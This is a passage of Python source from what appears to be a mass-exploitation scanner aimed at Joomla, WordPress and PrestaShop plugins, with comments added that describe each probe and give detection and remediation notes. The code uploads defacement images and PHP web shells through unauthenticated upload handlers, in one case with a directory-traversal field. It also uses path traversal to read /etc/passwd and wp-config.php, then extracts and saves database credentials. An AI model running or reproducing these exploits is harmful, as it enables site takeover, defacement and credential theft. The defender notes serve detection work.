  2672. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
  2673. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
  2674. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2675. self.Print_Vuln_index(uploadedPathIndex)
  2676. with open('result/Index_results.txt', 'a') as writer:
  2677. writer.write(uploadedPathIndex + '\n')
  2678. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
  2679. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
  2680. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
  2681. self.Print_vuln_Shell(uploadedPathShell)
  2682. with open('result/Shell_results.txt', 'a') as writer:
  2683. writer.write(uploadedPathShell + '\n')
  2684. else:
  2685. self.Print_NotVuln('pk_flexmenu', site)
  2686. else:
  2687. self.Print_NotVuln('pk_flexmenu', site)
  2688. except:
  2689. self.Print_NotVuln('pk_flexmenu', site)
  2690.  
  2691.  
  # Probe of /modules/nvn_export_orders/upload.php.
  # Flow as written: GET the handler; on HTTP 200, POST self.Jce_Deface_image
  # and then self.ShellPresta as multipart field 'images[]'; the files are
  # then looked for directly in /modules/nvn_export_orders/ (no uploads/
  # subdirectory) and the bodies checked for 'GIF89a' / 'Vuln!!'. Hits are
  # appended to the result/ files.
  # Defender notes: because the check path is the module root, file-integrity
  # monitoring on the module directory itself catches a successful write.
  # Remove or update the module and restrict upload.php to authenticated
  # back-office users.
  # NOTE(review): bare `except:` maps all errors to "Not Vuln".
  2692. def nvn_export_orders(self, site):
  2693. Exl = site + '/modules/nvn_export_orders/upload.php'
  2694. try:
  2695. Checkvuln = requests.get('http://' + Exl, timeout=5)
  2696. if Checkvuln.status_code == 200:
  2697. FileDataIndex = {'images[]': open(self.Jce_Deface_image, 'rb')}
  2698. FileDataShell = {'images[]': open(self.ShellPresta, 'rb')}
  2699. uploadedPathIndex = site + '/modules/nvn_export_orders/' + self.Jce_Deface_image.split('/')[1]
  2700. uploadedPathShell = site + '/modules/nvn_export_orders/' + self.ShellPresta.split('/')[1]
  2701. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
  2702. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
  2703. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2704. self.Print_Vuln_index(uploadedPathIndex)
  2705. with open('result/Index_results.txt', 'a') as writer:
  2706. writer.write(uploadedPathIndex + '\n')
  2707. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
  2708. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
  2709. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
  2710. self.Print_vuln_Shell(uploadedPathShell)
  2711. with open('result/Shell_results.txt', 'a') as writer:
  2712. writer.write(uploadedPathShell + '\n')
  2713. else:
  2714. self.Print_NotVuln('nvn_export_orders', site)
  2715. else:
  2716. self.Print_NotVuln('nvn_export_orders', site)
  2717. except:
  2718. self.Print_NotVuln('nvn_export_orders', site)
  2719.  
  # Probe of /modules/megamenu/uploadify/uploadify.php?id=pwn.
  # Flow as written: GET the URL; on HTTP 200, POST self.Jce_Deface_image as
  # multipart field 'Filedata'; the file is then looked for at the site root
  # (site + '/' + basename) and the body checked for 'GIF89a'; hits are
  # appended to result/Index_results.txt.
  # Defender notes: the check at the web root means a successful write lands
  # outside the module directory, so monitor the document root for new files.
  # The 'id=pwn' query value is a fixed string usable as a log match. Remove
  # the bundled uploadify script or update the module.
  # NOTE(review): bare `except:` maps all errors to "Not Vuln".
  2720. def megamenu(self, site):
  2721. try:
  2722. Exp = site + '/modules/megamenu/uploadify/uploadify.php?id=pwn'
  2723. Checkvuln = requests.get('http://' + Exp, timeout=5)
  2724. FileDataIndex = {'Filedata': open(self.Jce_Deface_image, 'rb')}
  2725. if Checkvuln.status_code == 200:
  2726. requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
  2727. IndexPath = site + '/' + self.Jce_Deface_image.split('/')[1]
  2728. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
  2729. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2730. self.Print_Vuln_index(IndexPath)
  2731. with open('result/Index_results.txt', 'a') as writer:
  2732. writer.write(IndexPath + '\n')
  2733. else:
  2734. self.Print_NotVuln('megamenu', site)
  2735. else:
  2736. self.Print_NotVuln('megamenu', site)
  2737. except:
  2738. self.Print_NotVuln('megamenu', site)
  2739.  
  2740.  
  2741.  
  # Probe of /modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php.
  # Flow as written: GET the handler; on HTTP 200, POST self.Jce_Deface_image
  # and then self.ShellPresta as multipart field 'image_upload'; each POST is
  # followed by a GET of the expected URL under .../upload/, checked for
  # 'GIF89a' / 'Vuln!!'. Hits are appended to result/Index_results.txt and
  # result/Shell_results.txt.
  # Defender notes: alert on anonymous multipart POSTs to the Ajax endpoint and
  # on any file in upload/ whose type is not an image. Remove or update the
  # module; enforce server-side type validation and disable script execution
  # in upload/.
  # NOTE(review): bare `except:` maps all errors to "Not Vuln".
  2742. def tdpsthemeoptionpanel(self, site):
  2743. Exl = site + '/modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php'
  2744. try:
  2745. Checkvuln = requests.get('http://' + Exl, timeout=5)
  2746. if Checkvuln.status_code == 200:
  2747. FileDataIndex = {'image_upload': open(self.Jce_Deface_image, 'rb')}
  2748. FileDataShell = {'image_upload': open(self.ShellPresta, 'rb')}
  2749. uploadedPathIndex = site + '/modules/tdpsthemeoptionpanel/upload/' + self.Jce_Deface_image.split('/')[1]
  2750. uploadedPathShell = site + '/modules/tdpsthemeoptionpanel/upload/' + self.ShellPresta.split('/')[1]
  2751. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
  2752. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
  2753. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2754. self.Print_Vuln_index(uploadedPathIndex)
  2755. with open('result/Index_results.txt', 'a') as writer:
  2756. writer.write(uploadedPathIndex + '\n')
  2757. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
  2758. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
  2759. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
  2760. self.Print_vuln_Shell(uploadedPathShell)
  2761. with open('result/Shell_results.txt', 'a') as writer:
  2762. writer.write(uploadedPathShell + '\n')
  2763. else:
  2764. self.Print_NotVuln('tdpsthemeoptionpanel', site)
  2765. else:
  2766. self.Print_NotVuln('tdpsthemeoptionpanel', site)
  2767. except:
  2768. self.Print_NotVuln('tdpsthemeoptionpanel', site)
  2769.  
  # Probe of /modules/psmodthemeoptionpanel/psmodthemeoptionpanel_ajax.php.
  # Flow as written: GET the handler; on HTTP 200, POST self.Jce_Deface_image
  # and then self.ShellPresta as multipart field 'image_upload'; each POST is
  # followed by a GET of the expected URL under .../upload/, checked for
  # 'GIF89a' / 'Vuln!!'. Hits are appended to the result/ files.
  # Defender notes: the request sequence is fixed and fast (5 s timeouts, no
  # delay between calls), so rate-based rules on /modules/*/..._ajax.php from a
  # single source are effective against this tool. Remove or update the module
  # and disable script execution in upload/.
  # NOTE(review): bare `except:` maps all errors to "Not Vuln".
  2770. def psmodthemeoptionpanel(self, site):
  2771. Exl = site + '/modules/psmodthemeoptionpanel/psmodthemeoptionpanel_ajax.php'
  2772. try:
  2773. Checkvuln = requests.get('http://' + Exl, timeout=5)
  2774. if Checkvuln.status_code == 200:
  2775. FileDataIndex = {'image_upload': open(self.Jce_Deface_image, 'rb')}
  2776. FileDataShell = {'image_upload': open(self.ShellPresta, 'rb')}
  2777. uploadedPathIndex = site + '/modules/psmodthemeoptionpanel/upload/' + self.Jce_Deface_image.split('/')[1]
  2778. uploadedPathShell = site + '/modules/psmodthemeoptionpanel/upload/' + self.ShellPresta.split('/')[1]
  2779. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
  2780. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
  2781. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2782. self.Print_Vuln_index(uploadedPathIndex)
  2783. with open('result/Index_results.txt', 'a') as writer:
  2784. writer.write(uploadedPathIndex + '\n')
  2785. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
  2786. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
  2787. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
  2788. self.Print_vuln_Shell(uploadedPathShell)
  2789. with open('result/Shell_results.txt', 'a') as writer:
  2790. writer.write(uploadedPathShell + '\n')
  2791. else:
  2792. self.Print_NotVuln('psmodthemeoptionpanel', site)
  2793. else:
  2794. self.Print_NotVuln('psmodthemeoptionpanel', site)
  2795. except:
  2796. self.Print_NotVuln('psmodthemeoptionpanel', site)
  2797.  
  2798.  
  # Probe of /modules/lib/redactor/file_upload.php.
  # Flow as written: GET the handler; on HTTP 200, POST self.Jce_Deface_image
  # and then self.ShellPresta as multipart field 'file'; the files are then
  # looked for under /masseditproduct/uploads/file/ (a different path from the
  # handler) and checked for 'GIF89a' / 'Vuln!!'. Hits are appended to the
  # result/ files.
  # Defender notes: correlate POSTs to the redactor file_upload.php with GETs
  # into /masseditproduct/uploads/file/; the two paths would not be linked by a
  # per-directory rule. Remove the bundled editor upload script or update the
  # module, and disable script execution in the uploads tree.
  # NOTE(review): bare `except:` maps all errors to "Not Vuln".
  2799. def lib(self, site):
  2800. Exl = site + '/modules/lib/redactor/file_upload.php'
  2801. try:
  2802. Checkvuln = requests.get('http://' + Exl, timeout=5)
  2803. if Checkvuln.status_code == 200:
  2804. FileDataIndex = {'file': open(self.Jce_Deface_image, 'rb')}
  2805. FileDataShell = {'file': open(self.ShellPresta, 'rb')}
  2806. uploadedPathIndex = site + '/masseditproduct/uploads/file/' + self.Jce_Deface_image.split('/')[1]
  2807. uploadedPathShell = site + '/masseditproduct/uploads/file/' + self.ShellPresta.split('/')[1]
  2808. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
  2809. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
  2810. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2811. self.Print_Vuln_index(uploadedPathIndex)
  2812. with open('result/Index_results.txt', 'a') as writer:
  2813. writer.write(uploadedPathIndex + '\n')
  2814. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
  2815. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
  2816. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
  2817. self.Print_vuln_Shell(uploadedPathShell)
  2818. with open('result/Shell_results.txt', 'a') as writer:
  2819. writer.write(uploadedPathShell + '\n')
  2820. else:
  2821. self.Print_NotVuln('lib', site)
  2822. else:
  2823. self.Print_NotVuln('lib', site)
  2824. except:
  2825. self.Print_NotVuln('lib', site)
  2826.  
  # Probe of the upload endpoint shipped under
  # /components/com_jbcatalog/libraries/jsupload/server/php.
  # Flow as written: GET the endpoint; on HTTP 200, POST self.ShellPresta as
  # multipart field 'files[]' and fetch .../php/files/up.php; 'Vuln!!' in the
  # body is logged to result/Shell_results.txt. Otherwise the image file is
  # POSTed and .../php/files/<basename> is checked for 'GIF89a', logged to
  # result/Index_results.txt.
  # Defender notes: a file named up.php (or any script) in the component's
  # files/ directory is the indicator; presumably up.php is the basename of
  # self.ShellPresta, which is defined outside this view. Remove the bundled
  # upload server script or update the component, and disable script execution
  # in files/.
  # NOTE(review): there is no try/except here, so request errors propagate to
  # the caller.
  2827. def Com_Jbcatalog(self, site):
  2828. Check = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php', timeout=10)
  2829. if Check.status_code == 200:
  2830. ShellFile = {'files[]': open(self.ShellPresta, 'rb')}
  2831. requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
  2832. files=ShellFile)
  2833. CheckShell = requests.get('http://' + site +
  2834. '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php', timeout=5)
  2835.  
  2836. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  2837. self.Print_vuln_Shell(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php')
  2838. with open('result/Shell_results.txt', 'a') as writer:
  2839. writer.write(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php\n')
  2840. else:
  2841. ShellFile = {'files[]': open(self.Jce_Deface_image, 'rb')}
  2842. requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
  2843. files=ShellFile)
  2844.  
  2845. CheckIndex = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/'
  2846. 'php/files/' + self.Jce_Deface_image.split('/')[1])
  2847. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2848. self.Print_Vuln_index(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/'
  2849. + self.Jce_Deface_image.split('/')[1])
  2850. with open('result/Index_results.txt', 'a') as writer:
  2851. writer.write(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/'
  2852. + self.Jce_Deface_image.split('/')[1] + '\n')
  2853. else:
  2854. self.Print_NotVuln('Com_Jbcatalog', site)
  2855. else:
  2856. self.Print_NotVuln('Com_Jbcatalog', site)
  2857.  
  2858.  
  2859.  
  # Probe of /components/com_sexycontactform/fileupload/.
  # Flow as written: GET the directory URL; on HTTP 200, POST self.ShellPresta
  # as multipart field 'files[]' and fetch .../fileupload/files/up.php;
  # 'Vuln!!' in the body is logged to result/Shell_results.txt. Otherwise a
  # second POST carries the image file and .../fileupload/files/<basename> is
  # checked for 'GIF89a', logged to result/Index_results.txt.
  # Defender notes: watch for anonymous multipart POSTs to the fileupload/
  # endpoint and for script files in fileupload/files/. Update or remove the
  # component; the upload endpoint should validate file type server-side and
  # the files/ directory should not execute scripts.
  # NOTE(review): there is no try/except here, so request errors propagate to
  # the caller.
  2860. def Com_SexyContactform(self, site):
  2861. Check = requests.get('http://' + site + '/components/com_sexycontactform/fileupload/', timeout=10)
  2862. if Check.status_code == 200:
  2863. IndeX = {'files[]': open(self.Jce_Deface_image, 'rb')}
  2864. ShellFile = {'files[]': open(self.ShellPresta, 'rb')}
  2865. requests.post('http://' + site + '/components/com_sexycontactform/fileupload/',
  2866. files=ShellFile, timeout=10)
  2867. CheckShell = requests.get('http://' + site +
  2868. '/components/com_sexycontactform/fileupload/files/up.php', timeout=5)
  2869.  
  2870. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  2871. self.Print_vuln_Shell(site + '/components/com_sexycontactform/fileupload/files/up.php')
  2872. with open('result/Shell_results.txt', 'a') as writer:
  2873. writer.write(site + '/components/com_sexycontactform/fileupload/files/up.php\n')
  2874. else:
  2875. requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
  2876. files=IndeX)
  2877.  
  2878. CheckIndex = requests.get('http://' + site + '/components/com_sexycontactform/fileupload/files/'
  2879. + self.Jce_Deface_image.split('/')[1])
  2880. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2881. self.Print_Vuln_index(site + '/components/com_sexycontactform/fileupload/files/'
  2882. + self.Jce_Deface_image.split('/')[1])
  2883. with open('result/Index_results.txt', 'a') as writer:
  2884. writer.write(site + '/components/com_sexycontactform/fileupload/files/'
  2885. + self.Jce_Deface_image.split('/')[1] + '\n')
  2886. else:
  2887. self.Print_NotVuln('Com_SexyContactform', site)
  2888. else:
  2889. self.Print_NotVuln('Com_SexyContactform', site)
  2890.  
  2891.  
  # Probe of /administrator/components/com_rokdownloads/assets/uploadhandler.php.
  # Flow as written: GET the handler and continue on HTTP 200 or 500; POST
  # self.ShellPresta as multipart field 'files[]' with form field
  # jpath='../../../../'; fetch /images/stories/up.php and look for 'Vuln!!'
  # (logged to result/Shell_results.txt). Otherwise the image is POSTed the
  # same way and /images/stories/<basename> is checked for 'GIF89a'.
  # Defender notes: a 'jpath' form value made of '../' sequences in a request
  # to a script under /administrator/ without an admin session is a
  # high-confidence match. New files in /images/stories/ are the on-disk
  # indicator. Update or remove the component, and disable script execution
  # under /images/.
  # NOTE(review): there is no try/except here, so request errors propagate to
  # the caller.
  2892. def Com_rokdownloads(self, site):
  2893. Check = requests.get('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
  2894. timeout=10)
  2895. if Check.status_code == 200 or Check.status_code == 500:
  2896. IndeX = {'files[]': open(self.Jce_Deface_image, 'rb')}
  2897.  
  2898. ShellFile = {'files[]': open(self.ShellPresta, 'rb')}
  2899. Datapost = {'jpath': '../../../../'}
  2900. requests.post('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
  2901. files=ShellFile, data=Datapost, timeout=10)
  2902. CheckShell = requests.get('http://' + site +
  2903. '/images/stories/up.php', timeout=5)
  2904.  
  2905. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  2906. self.Print_vuln_Shell(site + '/images/stories/up.php')
  2907. with open('result/Shell_results.txt', 'a') as writer:
  2908. writer.write(site + '/images/stories/up.php\n')
  2909. else:
  2910. requests.post('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
  2911. files=IndeX, data=Datapost, timeout=10)
  2912.  
  2913. CheckIndex = requests.get('http://' + site + '/images/stories/' + self.Jce_Deface_image.split('/')[1])
  2914. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  2915. self.Print_Vuln_index(site + '/images/stories/' + self.Jce_Deface_image.split('/')[1])
  2916. with open('result/Index_results.txt', 'a') as writer:
  2917. writer.write(site + '/images/stories/' + self.Jce_Deface_image.split('/')[1] + '\n')
  2918. else:
  2919. self.Print_NotVuln('Com_rokdownloads', site)
  2920. else:
  2921. self.Print_NotVuln('Com_rokdownloads', site)
  2922.  
  # Arbitrary-file-read probe against the wp-miniaudioplayer plugin.
  # Flow as written: GET the site front page; if the string
  # 'wp-miniaudioplayer' appears in it, GET
  # /wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=/etc/passwd
  # and treat 'nologin' in the body as a hit, appending the site name and the
  # whole response to result/Passwd_file.text.
  # Defender notes: an absolute system path in the 'fileurl' parameter is the
  # log pattern to alert on; a 200 response with passwd-style content means
  # the download script reads whatever path it is given. Update or remove the
  # plugin; the handler should resolve the requested path and refuse anything
  # outside the media directory.
  # NOTE(review): there is no try/except here, so request errors propagate to
  # the caller.
  2923. def wp_miniaudioplayer(self, site):
  2924. CheckVuln = requests.get('http://' + site, timeout=10)
  2925. if 'wp-miniaudioplayer' in CheckVuln.text.encode('utf-8'):
  2926. etc = requests.get('http://' + site +
  2927. '/wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=/etc/passwd', timeout=5)
  2928. if 'nologin' in etc.text.encode('utf-8'):
  2929. with open('result/Passwd_file.text', 'a') as writer:
  2930. writer.write('---------------------------\nSite: ' + site + '\n' + etc.text.encode('utf-8') + '\n')
  2931. self.Print_Vuln('wp-miniaudioplayer', site)
  2932. else:
  2933. self.Print_NotVuln('wp-miniaudioplayer', site)
  2934. else:
  2935. self.Print_NotVuln('wp-miniaudioplayer', site)
  2936.  
  2937.  
  # Path-traversal read of wp-config.php through the
  # wp-support-plus-responsive-ticket-system plugin's downloadAttachment.php.
  # Flow as written: GET the script with path=../../../../../wp-config.php; if
  # 'DB_PASSWORD' appears in the body, print a hit, append the full URL to
  # result/Config_results.txt, then regex-extract DB_HOST, DB_USER,
  # DB_PASSWORD and DB_NAME and append them to the same file.
  # Defender notes: '../' sequences together with 'wp-config.php' in a query
  # string are a high-signal log and WAF pattern. If such a request was
  # answered with the file, treat the database credentials and the WordPress
  # keys and salts as disclosed and rotate them. Update or remove the plugin;
  # the download handler must canonicalise the path and confine it to the
  # attachment directory.
  # NOTE(review): the inner bare `except:` prints "Not Vuln" after a hit was
  # already reported when any of the four regexes finds nothing.
  2938. def wp_support_plus_responsive_ticket_system(self, site):
  2939. try:
  2940. Exp = 'http://' + site + \
  2941. '/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/' \
  2942. 'downloadAttachment.php?path=../../../../../wp-config.php'
  2943. GetConfig = requests.get(Exp, timeout=5)
  2944. if 'DB_PASSWORD' in GetConfig.text.encode('utf-8'):
  2945. self.Print_vuln_Config(site)
  2946. with open('result/Config_results.txt', 'a') as ww:
  2947. ww.write('Full Config Path : ' + Exp + '\n')
  2948. try:
  2949. Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.text.encode('utf-8'))
  2950. Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.text.encode('utf-8'))
  2951. Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.text.encode('utf-8'))
  2952. Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.text.encode('utf-8'))
  2953. with open('result/Config_results.txt', 'a') as ww:
  2954. ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] +
  2955. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
  2956. 0] + '\n---------------------\n')
  2957. except:
  2958. self.Print_NotVuln('wp-support-plus-responsive-ticket-system', site)
  2959. else:
  2960. self.Print_NotVuln('wp-support-plus-responsive-ticket-system', site)
  2961. except:
  2962. self.Print_NotVuln('wp-support-plus-responsive-ticket-system', site)
  2963.  
  # Path-traversal read of wp-config.php through the eshop-magic plugin's
  # download.php (file=../../../../wp-config.php).
  # Flow as written: GET the URL built from `site` and the plugin path; if
  # 'DB_PASSWORD' appears in the body, print a hit, append the URL to
  # result/Config_results.txt, then regex-extract DB_HOST, DB_USER,
  # DB_PASSWORD and DB_NAME and append them to the same file.
  # Defender notes: alert on a 'file' parameter containing '../' or
  # 'wp-config.php'. A served config file means the database credentials and
  # WordPress keys and salts need rotating. Update or remove the plugin; the
  # handler should only serve files from an allowlisted directory.
  # NOTE(review): both bare `except:` clauses report "Not Vuln" for any error,
  # including network failures.
  2964. def eshop_magic(self, site):
  2965. try:
  2966. Exp = 'http://' + site + \
  2967. 'wp-content/plugins/eshop-magic/download.php?file=../../../../wp-config.php'
  2968. GetConfig = requests.get(Exp, timeout=5)
  2969. if 'DB_PASSWORD' in GetConfig.text.encode('utf-8'):
  2970. self.Print_vuln_Config(site)
  2971. with open('result/Config_results.txt', 'a') as ww:
  2972. ww.write('Full Config Path : ' + Exp + '\n')
  2973. try:
  2974. Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.text.encode('utf-8'))
  2975. Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.text.encode('utf-8'))
  2976. Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.text.encode('utf-8'))
  2977. Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.text.encode('utf-8'))
  2978. with open('result/Config_results.txt', 'a') as ww:
  2979. ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] +
  2980. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
  2981. 0] + '\n---------------------\n')
  2982. except:
  2983. self.Print_NotVuln('eshop-magic', site)
  2984. else:
  2985. self.Print_NotVuln('eshop-magic', site)
  2986. except:
  2987. self.Print_NotVuln('eshop-magic', site)
  2988.  
  # Path-traversal read of wp-config.php through the ungallery plugin's
  # source_vuln.php (pic=../../../../../wp-config.php).
  # Flow as written: GET the URL; if 'DB_PASSWORD' appears in the body, print
  # a hit, append the URL to result/Config_results.txt, then regex-extract
  # DB_HOST, DB_USER, DB_PASSWORD and DB_NAME and append them to the same
  # file.
  # Defender notes: a 'pic' parameter that is not an image path, especially
  # one containing '../', is the log pattern. If the config was served,
  # rotate the database password and WordPress keys and salts and check
  # whether the database port is reachable from outside. Update or remove the
  # plugin.
  # NOTE(review): both bare `except:` clauses report "Not Vuln" for any error,
  # including network failures.
  2989. def ungallery(self, site):
  2990. try:
  2991. Exp = 'http://' + site + \
  2992. '/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php'
  2993. GetConfig = requests.get(Exp, timeout=5)
  2994. if 'DB_PASSWORD' in GetConfig.text.encode('utf-8'):
  2995. self.Print_vuln_Config(site)
  2996. with open('result/Config_results.txt', 'a') as ww:
  2997. ww.write('Full Config Path : ' + Exp + '\n')
  2998. try:
  2999. Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.text.encode('utf-8'))
  3000. Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.text.encode('utf-8'))
  3001. Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.text.encode('utf-8'))
  3002. Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.text.encode('utf-8'))
  3003. with open('result/Config_results.txt', 'a') as ww:
  3004. ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] +
  3005. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
  3006. 0] + '\n---------------------\n')
  3007. except:
  3008. self.Print_NotVuln('ungallery', site)
  3009. else:
  3010. self.Print_NotVuln('ungallery', site)
  3011. except:
  3012. self.Print_NotVuln('ungallery', site)
  3013.  
  3014.  
  # Probe of /administrator/components/com_extplorer/uploadhandler.php.
  # Flow as written: GET the handler and continue on HTTP 200 or 500; POST
  # self.ShellPresta as multipart field 'Filedata'; fetch
  # /images/stories/up.php and look for 'Vuln!!' (logged to
  # result/Shell_results.txt). Otherwise the image is POSTed and
  # /images/stories/<basename> is checked for 'GIF89a' (logged to
  # result/Index_results.txt).
  # Defender notes: an upload handler under /administrator/ that answers
  # without an admin session is the root problem; restrict the whole
  # /administrator/ tree at the web server as well as in the application.
  # New files in /images/stories/ are the on-disk indicator. Update or remove
  # the component and disable script execution under /images/.
  # NOTE(review): there is no try/except here, so request errors propagate to
  # the caller.
  3015. def Com_extplorer(self, site):
  3016. Check = requests.get('http://' + site + '/administrator/components/com_extplorer/uploadhandler.php',
  3017. timeout=10)
  3018. if Check.status_code == 200 or Check.status_code == 500:
  3019. IndeX = {'Filedata': open(self.Jce_Deface_image, 'rb')}
  3020.  
  3021. ShellFile = {'Filedata': open(self.ShellPresta, 'rb')}
  3022. requests.post('http://' + site + '/administrator/components/com_extplorer/uploadhandler.php',
  3023. files=ShellFile, timeout=10)
  3024. CheckShell = requests.get('http://' + site +
  3025. '/images/stories/up.php', timeout=5)
  3026.  
  3027. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  3028. self.Print_vuln_Shell(site + '/images/stories/up.php')
  3029. with open('result/Shell_results.txt', 'a') as writer:
  3030. writer.write(site + '/images/stories/up.php\n')
  3031. else:
  3032. requests.post('http://' + site + '/administrator/components/com_extplorer/uploadhandler.php',
  3033. files=IndeX, timeout=10)
  3034.  
  3035. CheckIndex = requests.get('http://' + site + '/images/stories/' + self.Jce_Deface_image.split('/')[1])
  3036. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  3037. self.Print_Vuln_index(site + '/images/stories/' + self.Jce_Deface_image.split('/')[1])
  3038. with open('result/Index_results.txt', 'a') as writer:
  3039. writer.write(site + '/images/stories/' + self.Jce_Deface_image.split('/')[1] + '\n')
  3040. else:
  3041. self.Print_NotVuln('Com_extplorer', site)
  3042. else:
  3043. self.Print_NotVuln('Com_extplorer', site)
  3044.  
  # Image-upload probe; despite the method name, the request URL targets
  # index.php?option=com_adsmanager&task=upload&tmpl=component.
  # Flow as written: POST self.Jce_Deface_image as multipart field 'file' with
  # form fields name=<basename> and submit=Upload; if the response contains
  # '"jsonrpc"', GET /tmp/plupload/<basename> and treat 'GIF89a' as a hit,
  # appended to result/Index_results.txt.
  # Defender notes: the indicator is a new file in the site's /tmp/plupload/
  # directory that is reachable over HTTP. Update the component, and make the
  # temporary upload directory non-browsable and non-executable.
  # NOTE(review): when '"jsonrpc"' is absent nothing is printed at all, so a
  # silent run of this method does not mean the host was unreachable. The
  # label passed to Print_NotVuln is 'Com_jwallpapers', not the component in
  # the URL.
  3045. def Com_jwallpapers_index(self, site):
  3046. try:
  3047. fileindex = {'file': open(self.Jce_Deface_image, 'rb')}
  3048. post_data = {"name": self.Jce_Deface_image.split('/')[1],
  3049. "submit": "Upload"}
  3050. Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
  3051. GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
  3052. if '"jsonrpc"' in GoT.text.encode('utf-8'):
  3053. Check = requests.get('http://' + site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1], timeout=5)
  3054. if 'GIF89a' in Check.text.encode('utf-8'):
  3055. self.Print_Vuln_index(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1])
  3056. with open('result/Index_results.txt', 'a') as writer:
  3057. writer.write(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1] + '\n')
  3058. else:
  3059. self.Print_NotVuln('Com_jwallpapers', site)
  3060. except:
  3061. self.Print_NotVuln('Com_jwallpapers', site)
  3062.  
  # Script-upload probe; despite the method name, the request URL targets
  # index.php?option=com_adsmanager&task=upload&tmpl=component.
  # Flow as written: POST the local file self.indeX as multipart field 'file'
  # under the names vuln.php, vuln.phP and vuln.phtml; then GET each of those
  # under /tmp/plupload/, plus /vuln.htm and /images/vuln.php. If any of the
  # three /tmp/plupload/ responses contains 'Vuln!!', the /images/vuln.php and
  # /vuln.htm responses are checked and logged to result/Shell_results.txt and
  # result/Index_results.txt; in every other case the method falls back to
  # self.Com_jwallpapers_index(site).
  # Defender notes: the three name variants show the upload is expected to
  # filter on extension; an allowlist compared case-insensitively, plus a
  # server configuration that never executes files from /tmp/plupload/,
  # defeats all three. Indicators on disk: vuln.php / vuln.phP / vuln.phtml
  # in /tmp/plupload/, /images/vuln.php and /vuln.htm at the web root.
  # NOTE(review): the three `if/elif` branches are identical apart from the
  # response they test.
  3063. def Com_jwallpapers_Shell(self, site):
  3064. try:
